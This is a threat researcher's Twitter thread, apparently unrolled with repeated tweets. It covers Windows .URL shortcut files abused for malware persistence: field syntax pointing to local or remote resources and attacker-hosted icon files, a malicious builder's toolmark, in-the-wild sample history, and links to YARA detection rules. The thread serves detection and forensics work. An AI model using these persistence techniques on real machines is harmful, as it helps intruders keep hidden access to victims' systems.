,
11 tweets,
20 min read
Read on Twitter
@Hexacorn @cglyer @HackingDave @DerbyCon This was a technique largely outside of my typical purview - thanks for the context @Hexacorn!
Here are some rules 📏 & in-the-wild history 📆 to share for .url persistence.
Rules: gist.github.com/itsreallynick/… (CC @cyb3rops)
A quick history on the two kinds of .URL files so far...
Here are some rules 📏 & in-the-wild history 📆 to share for .url persistence.
Rules: gist.github.com/itsreallynick/… (CC @cyb3rops)
A quick history on the two kinds of .URL files so far...
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 The reason for the two rules are the options
URL=file:///<local file>
*and*
URL=file://<remote resource URL>
I liked the second one more
As with all Windows scripting techniques, there are no doubt creative launch methods to replace "file://" here that are worth exploring 🤔
URL=file:///<local file>
*and*
URL=file://<remote resource URL>
I liked the second one more
As with all Windows scripting techniques, there are no doubt creative launch methods to replace "file://" here that are worth exploring 🤔
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 Quick history time!
(I didn't undertake a retrohunt, basing this on info at-hand)
🔍URL=file:///<local file>
At some point in ~2017 "local" .url persistence was added to commercial backdoors
Example 2017-05-03 06:07:14 (.iso dropper) virustotal.com/gui/file/8b9da…
...
(I didn't undertake a retrohunt, basing this on info at-hand)
🔍URL=file:///<local file>
At some point in ~2017 "local" .url persistence was added to commercial backdoors
Example 2017-05-03 06:07:14 (.iso dropper) virustotal.com/gui/file/8b9da…
...
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 Around the same time we have BOTH:
1⃣the awesome @Hexacorn blog (hexacorn.com/blog/2018/02/0…) - I still love that hotkey technique! 🥵🔑
2⃣the adoption of remote/SMB resources for .url persistence
🔍URL=file://<remote resource URL>
Example 2018-03-13 10:47:05
virustotal.com/gui/file/93f22…
1⃣the awesome @Hexacorn blog (hexacorn.com/blog/2018/02/0…) - I still love that hotkey technique! 🥵🔑
2⃣the adoption of remote/SMB resources for .url persistence
🔍URL=file://<remote resource URL>
Example 2018-03-13 10:47:05
virustotal.com/gui/file/93f22…
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 This was a quick search on when it was *popularized*, so it'd be interesting to retrohunt back to when truly *first seen*...
BTW: I liked the .img self-extracting archive trick the most - though both techniques appear to have been used by the commercial RAT devs for a bit
BTW: I liked the .img self-extracting archive trick the most - though both techniques appear to have been used by the commercial RAT devs for a bit
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 There's definitely a broader spectrum of .URL anomalies to explore.
I'll tinker more & provide some updated rules
As a preview, here is a bad guy's .url builder toolmark:
✅IconFile=C:\Windows\system32\shell32.dll
🙈IconFile=C:\Windows\system32\SHELL32.dl
"CCE_20180427_###.URL"
I'll tinker more & provide some updated rules
As a preview, here is a bad guy's .url builder toolmark:
✅IconFile=C:\Windows\system32\shell32.dll
🙈IconFile=C:\Windows\system32\SHELL32.dl
"CCE_20180427_###.URL"
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 TIL .url files can have remotely hosted IconFile's
🔍IconFile=<attacker-controlled infrastructure>
I wonder if this would provide web log analytics on successful .url persistence? #probablyinteresting
Updated yara rule: gist.github.com/itsreallynick/…
🔍IconFile=<attacker-controlled infrastructure>
I wonder if this would provide web log analytics on successful .url persistence? #probablyinteresting
Updated yara rule: gist.github.com/itsreallynick/…
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 If you broaden and look at who was using these prior to 2017, it gets pretty interesting.
Take a glimpse* at this creative XLS we obtained in 2014, establishing .URL persistence, checks on startup paths, & fun web functions including Google Translate.
*unable to share sample 😧
Take a glimpse* at this creative XLS we obtained in 2014, establishing .URL persistence, checks on startup paths, & fun web functions including Google Translate.
*unable to share sample 😧
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 Despite MSFT lacking good docs for .URL files, today I found 1998 post "Unofficial Guide to the URL File Format": lyberty.com/encyc/articles…
#DFIR will enjoy the "Modified" field.
I wondered if BaseURL can be abused. So far looks like no? Turns out this field is super rare though.
#DFIR will enjoy the "Modified" field.
I wondered if BaseURL can be abused. So far looks like no? Turns out this field is super rare though.
@Hexacorn @cglyer @HackingDave @DerbyCon @cyb3rops @QW5kcmV3 Pictured: an Excel sheet macro that drops a .URL with a "mailto:" link 📨
If you can baseline what's expected in a file format, you can find anomalies. No mega finds on .URLs today, but I hope I inspired someone to be curious. 👍🏽
All yara rules are here: gist.github.com/itsreallynick/…
If you can baseline what's expected in a file format, you can find anomalies. No mega finds on .URLs today, but I hope I inspired someone to be curious. 👍🏽
All yara rules are here: gist.github.com/itsreallynick/…
